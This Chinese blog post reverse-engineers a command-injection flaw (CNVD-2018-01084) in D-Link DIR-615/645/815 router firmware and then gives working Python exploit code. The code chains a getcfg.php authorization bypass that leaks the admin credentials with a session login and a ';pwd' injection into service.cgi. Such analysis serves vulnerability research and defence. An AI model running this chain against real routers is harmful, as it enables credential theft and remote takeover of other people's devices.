D-Link RCE漏洞分析

最新推荐文章于 2024-09-06 19:14:56 发布
最新推荐文章于 2024-09-06 19:14:56 发布
阅读量518 收藏 1
点赞数 1
分类专栏: IOT漏洞挖掘学习笔记 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43137410/article/details/126767796
版权

0x00 漏洞概述

​ 该漏洞编号CNVD-2018-01084,受影响的型号包括D-Link DIR 615、D-Link DIR 645 、D-Link DIR 815,受影响的固件版本为1.03及之前。

​ 此外该漏洞利用过程中会验证seesion,需要配合之前的越权漏洞使用,越权漏洞分析请查看之前的文章。(越权漏洞分析

0x01 漏洞成因

​ 该漏洞是由于cgibin在处理service.cgi时,拼接了HTTP POST请求中的数据,造成后台命令拼接,实现命令注入,最终导致远程命令执行。

0x02 漏洞分析

​ 使用IDA打开cgibin程序,定位到main函数。

在这里插入图片描述

​ 追踪service.cgi分支跟进servicecgi_main函数。

在这里插入图片描述

service_main函数分析

在这里插入图片描述

  • 首先调用getenv函数获取请求参数REQUEST_METHOD的值。
  • 将返回值,即请求方式存入s0寄存器。
  • 如果v0不等于0,跳转到分支loc_40CE6C。

分支loc_40CE6C分析

在这里插入图片描述

  • 调用strcasecmp函数对返回值v0与字符串POST进行比较。

  • 结果如果不为0则跳转到分支loc_40CEA0再与GET进行比较。

  • 我们知道漏洞触发点在POST方式,就不再分析GET请求方式分支。

    在这里插入图片描述

  • 将cgibin_parse_request函数地址载入t9寄存器

  • 将sub_40D1CC函数地址载入a0寄存器

  • 将a1寄存器置0

  • 将a2寄存器的值存为0x400

  • 调用cgibin_parse_request函数对请求参数进行解析

  • 如果返回值大于0则跳转分支loc_40CF20,从cgibin_parse_request函数分析可知,当存在请求参数时,返回值大于0.

cgibin_parse_request函数分析

  • 通过调用getenv函数,获取CONTENT_TYPE,CONTENT_LENGTH,REQUEST_URI的值。
  • 通过sobj系列函数创建一块内存空间,存储请求参数的值。
  • 具体的分析在越权访问配置文件的文章中已做过详细分析,此处就不再赘述。

分支loc_40CF20分析

在这里插入图片描述

  • 调用sess_ispoweruser函数
  • sess_ispoweruser是对权限进行验证
  • 所以使用该漏洞需配合越权漏洞,在登录之后使用。
  • 有兴趣的可以跟进sess_ispoweruser函数分析。
  • 然后跳转到分支loc_40CF58。

分支loc_40CF58分析

在这里插入图片描述

  • 三次调用函数sub_40CD50。
  • 参数分别为:EVENT、ACTION和SERVICE。
  • 基本可以确定函数sub_40CD50是对POST请求参数的处理。
  • 如果返回值s2为0则跳转分支loc_40CFA4。

sub_40CD50函数分析

  • 分别对EVENT、ACTION和SERVICE参数进行判断。
  • 如果存在则返回非0的返回值。

在这里插入图片描述

  • 如果event参数存在,则继续向下执行。
  • 将字符串"event %s > /dev/null"传入参数a0寄存器。
  • 调用lxmldbc_system函数。

lxmldbc_system函数分析

在这里插入图片描述

  • 先调用vsnprintf函数将请求参数写入格式化字符串"event %s > /dev/null"并存入a0。
  • 然后调用system函数执行a0中的命令。
  • 在传入请求参数和调用命令的过程中,并未对请求参数进行判断,导致实现命令注入。

0x03 漏洞利用

权限获取

  • 首先利用越权漏洞读取配置信息获取账号密码

  • 模拟登录

    • 通过抓包获取登录请求参数

    在这里插入图片描述

    • 实现登录

  • 获取session

  • 权限获取代码

url = r'http://xxx.xxx.xxx.xxx:xxxx'

m_payload = "SERVICES=DEVICE.ACCOUNT&attack=ture%0aAUTHORIZED_GROUP=1"


header = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
}
res1 = requests.post(url+'/getcfg.php',data=m_payload,verify=False,headers=header)

username = re.findall("<name>(.*?)</name>",res1.text)[0]
password = re.findall("<password>(.*?)</password>",res1.text)[0]

s_payload = {
    "REPORT_METHOD": "xml",
    "ACTION": "login_plaintext",
    "USER": username,
    "PASSWD": password,
    "CAPTCHA":""
}

s = requests.session()
res2 = s.post(url+'/session.cgi',data=s_payload,verify=False,headers=header)

远程命令执行

rce_payload = "EVENT=;%s%%26"%"pwd"
res3 = s.post(url+'/service.cgi',data=rce_payload,verify=False,headers=header)
print(res3.text)

在这里插入图片描述

0x04 漏洞利用脚本

​ EXP请关注公众号“乌托邦安全团队”回复关键“菜鸡师傅”获取EXP下载地址,仅供学习交流,切勿使用进行恶意攻击!

​ PS:exp可能写得并不是很完美,欢迎各位师傅指正批评和补充,谢谢!

D-Link NAS 未授权RCE漏洞复现(CVE-2024-3273)
0xSec
04-09 1104
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。
D-Link 5个安全漏洞
systemino的博客
08-25 2357
7月早些时间,研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日,又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞,攻击者利用这些漏洞可以实现网络入侵。此外,由于部分设备已经不再更新,因此无法修复。 漏洞概述 这些漏洞包括反射型XSS攻击、缓冲区溢出漏洞、认证绕过和任意代码执行,分别是: CVE-2020-15892 CVE-2020-15892漏洞是基于栈的缓冲区溢出漏洞漏洞位于ssi 二进制文件中,可能会引发任意命令执行。 CVE-2020-
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2261
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
D-Link 不打算修复 DIR-846W 路由器中的这四个RCE漏洞
smellycat000的专栏
09-04 248
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士D-Link 提醒称,DIR-846W 路由器的所有硬件和固件版本均受四个远程代码执行 (RCE) 漏洞影响,不过由于该产品已达生命周期,因此不予修复。这四个RCE漏洞中,其中三个是“严重”级别,无需认证,由安全研究员 yali-1002发现,后者在GitHub 仓库中发布了最少详情。这名研究员在2024年8月27日公布了该信息,不过目前并未发布...
D-Link DIR-645 信息泄露漏洞
weixin_30466039的博客
03-20 491
D-Link DIR-645getcfg.php文件由于过滤不严格导致信息泄露漏洞。 $SERVICE_COUNT = cut_count($_POST["SERVICES"], ","); TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]); $SERVICE_INDEX = 0...
D-Link设备远程命令执行漏洞(CVE-2024-3273)
qq_69775412的博客
04-30 460
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞
D-Link 路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告.pdf
02-28
近日,国家信息安全漏洞共享平台(CNVD)收录了D-Link DIR系列路由器身份验证信息泄露漏洞和远程命令执行漏洞(CNVD-2017-20002、CNVD-2017-20001)。远程攻击者利用漏洞可获取路由器后台登录凭证并执行任意代码。相关利用代码已在互联网公开,受到影响的设备数量根据标定超过20万台,有可能会诱发大规模的网络攻击
CVE-2019-16920:D-link RCE漏洞
systemino的博客
10-10 1786
简介 2019年9月,Fortinet FortiGuard实验室发现并报告了D-Link 产品中的有个非认证的命令注入漏洞——CVE-2019-16920,成功利用该漏洞可以导致远程代码执行。因为该漏洞可以在不经过认证的情况下远程触发,因此研究人员将该漏洞评为中危。 受影响的产品包括D-Link的: ·DIR-655 ·DIR-866L ·DIR-652 ·DHP-1565 ...
WebLogic CVE-2021-2394 RCE 漏洞分析
HBohan的博客
07-26 2632
漏洞简述 2021年3月15日墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server RCE漏洞,2021年7月21日Oracle发布了致谢信息。 这是一个二次反序列化漏洞,是cve-2020-14756和cve-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。 漏洞分析 最开始我是发现了oracle.eclipselink.coherence.integrated.internal.cache.SerializationHelper类中的re.
【CVE-2019-16920】多款D-Link路由器的未授权RCE漏洞复现
Blog of Jaoing
04-22 2042
友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品......
D-Link (CVE-2020-24581/24579) RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-27 6494
简介 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本漏洞源于包含一个execute cmd.cgi特性、该特性允许经过身份验证的用户执行操作系统命令,在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面,组合这两个漏洞以实现未授权的任意代码执行。 fofa body="DSL-2888A" 影响范围 AU_2.31_V1.1.47ae55 <= EG_1.00b4 .
浅谈D-Link系列路由器漏洞挖掘入门
10-02
主要介绍了浅谈D-Link系列路由器漏洞挖掘入门,详细的介绍了D-Link系列的各种漏洞,具有一定的参考价值,有兴趣的可以了解一下
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
qq_17754023的博客
04-29 390
D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。当输入错误密码时链接会跳到http://IP/page/login/login.html?error=fail。修改为poc即可远程执行命令。
D-link850路由器漏洞挖掘与利用
weixin_43046297的博客
12-28 1928
D-link850文件结构和各部分功能: 分析小型路由器,D-link850是个经典案例,解析完固件后,首先要搞清楚文件系统,可以从前端入手,追踪其数据流向,看前端对应的后端二进制处理文件。 因此我们系统地梳理一下D-link850存在的相关漏洞及发现过程: 敏感信息泄露: 首先我们不知道漏洞的位置,我们仅通过前端的相关信息进行数据流的追踪: 快捷配置界面:bsc_easysetup.php 但是解析后的系统文件夹内有3处有bsc_easysetup.php(web文件下,webinc的bo.
D-Link DAP-1860:远程命令执行和认证绕过漏洞
NOSEC2019的博客
12-10 930
介绍 2019年9月,我在D-Link Access Point(DAP-1860)上发现了两个漏洞,分别是命令注入导致的远程代码执行和身份验证绕过。这两个漏洞能帮助攻击者在不进行身份验证的情况下远程控制设备。如果你的上网设备是从D-Link购买的,并且型号是DAP-1860,请立刻更新固件或联系厂商寻求帮助,因为我发现的漏洞影响了当时最新版本的DAP-1860固件。 以下是DAP-1860的W...
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
weixin_43567873的博客
04-04 76
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
复现 DLink DIR-859 RCE 漏洞(CVE-2019–20215)
wcwdnmdnmd的博客
12-20 1424
复现 DLink DIR-859 RCE 漏洞(CVE-2019–20215)漏洞介绍漏洞影响漏洞等级环境搭建模拟攻击漏洞原理解决方案 漏洞介绍 该漏洞允许远程攻击者通过 urn 执行任意操作系统命令:到 /htdocs/cgibin 中 ssdpcgi()中的 M-SEARCH 方法,因为 REMOTE_PORT 处理不当。urn: service/device 的值使用 strstr 函数进行检查,该函数允许攻击者连接由 shell 元字符分隔的任意命令。 漏洞影响 D-Link DIR-859 1.0
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1
2401_84009749的博客
04-04 365
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
保姆级CVE-2018-17066漏洞复现 DLink命令注入漏洞(更新完结)
最新发布
weixin_51339377的博客
09-06 383
之后按照之前复现的方式一样 我们丢到kali中执行binwalk解析。之后为了模拟 可以在kali里安装qemu-mipsel。在bin目录下可以尝试将goahead的环境搭配好。固件官网可以进行下载。
ThinkPHP 5.0.0-23 RCE漏洞深度剖析与修复策略
ThinkPHP 5.0.0至5.0.23版本存在远程代码执行(RCE漏洞分析。2019年1月11日,ThinkPHP官方发布安全补丁,修复了一个GETSHELL漏洞。本文将深入剖析这一漏洞,并提供漏洞重现步骤以及利用PoC(Proof of Concept,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值